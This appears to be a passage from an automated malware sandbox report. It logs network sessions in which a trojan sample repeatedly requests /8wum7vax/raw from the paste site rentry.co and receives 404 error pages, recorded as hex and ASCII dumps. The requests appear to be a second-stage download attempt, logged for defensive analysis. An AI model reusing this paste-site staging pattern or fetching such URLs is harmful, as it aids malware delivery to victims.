                                                                                        2024-10-18 10:42:24 UTC692INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:24 UTC1369INData Raw: 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e
                                                                                        Data Ascii: 512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editin
                                                                                        2024-10-18 10:42:24 UTC1369INData Raw: 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d
                                                                                        Data Ascii: org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-
                                                                                        2024-10-18 10:42:24 UTC1030INData Raw: 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 65 34 32 64 30 36 32 64 32 64 27 2c 74 3a 27 4d
                                                                                        Data Ascii: src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ebe42d062d2d',t:'M
                                                                                        2024-10-18 10:42:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.660633104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:27 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:27 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:27 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDlm95rmJlu8Q6iizEamsI53VTJj4i0rozkfQNxnuRvCR1QC6U7aqUQdFvqLU45n7XG6LZ0Cf1n%2BfUegETiiMpZIxJ8E7Wq9nGwQRcdREy7t2EPiAvRuo%2BCpzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ebf96f3a6b67-DFW
                                                                                        2024-10-18 10:42:27 UTC715INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:27 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:42:27 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:42:27 UTC1006INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 66 39 36 66 33 61 36 62 36 37 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 30 4e 79 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ebf96f3a6b67',t:'MTcyOTI0ODE0Ny4wMDAwMDA=
                                                                                        2024-10-18 10:42:27 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:42:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.660636104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:30 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:30 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:30 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuX%2FCBrUCpfmEh734WwgSg9m9%2B2P2SmyxdOmSCw%2FMe%2Bw9pcTCraXqCWjumf7y0C1qfrbzV93AMuUawU6QKzNPudCyN1d2k%2FVjpIpx4%2BaPibnawubmCVqskBQhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec0bcc154871-DFW
                                                                                        2024-10-18 10:42:30 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:30 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:42:30 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:30 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 30 62 63 63 31 35 34 38 37 31 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 31 4d 43 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec0bcc154871',t:'MTcyOTI0ODE1MC4w
                                                                                        2024-10-18 10:42:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.660638104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:33 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:33 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:33 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnFjKmUVJpTkyycWaZEWGFZzTxrmIfV1B4AFiy08Lywww8DwV4llKlUD%2BOAeW%2BDdQ4J0nQMEi5AIdGv42%2BdlWveDpKCX8TvF1qI0TX54soi9wQE1YaQ3c9JcRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec1f1dc96b91-DFW
                                                                                        2024-10-18 10:42:33 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:33 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:42:33 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:33 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 31 66 31 64 63 39 36 62 39 31 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 31 4d 79 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec1f1dc96b91',t:'MTcyOTI0ODE1My4wMDAwMD
                                                                                        2024-10-18 10:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.660641104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:36 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:36 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:36 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCKBnMvtFOEVNA13aZSCc8B3lZg9jByGnE6PlB%2Fs9tTGJoJOynAdymygRvrlCjh%2F6CZ4XIORnCFaM4BWhOEEkp9vd2hc7AZEUo7BiomR4aL49oZH2YsVL9uwSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec3199e2463e-DFW
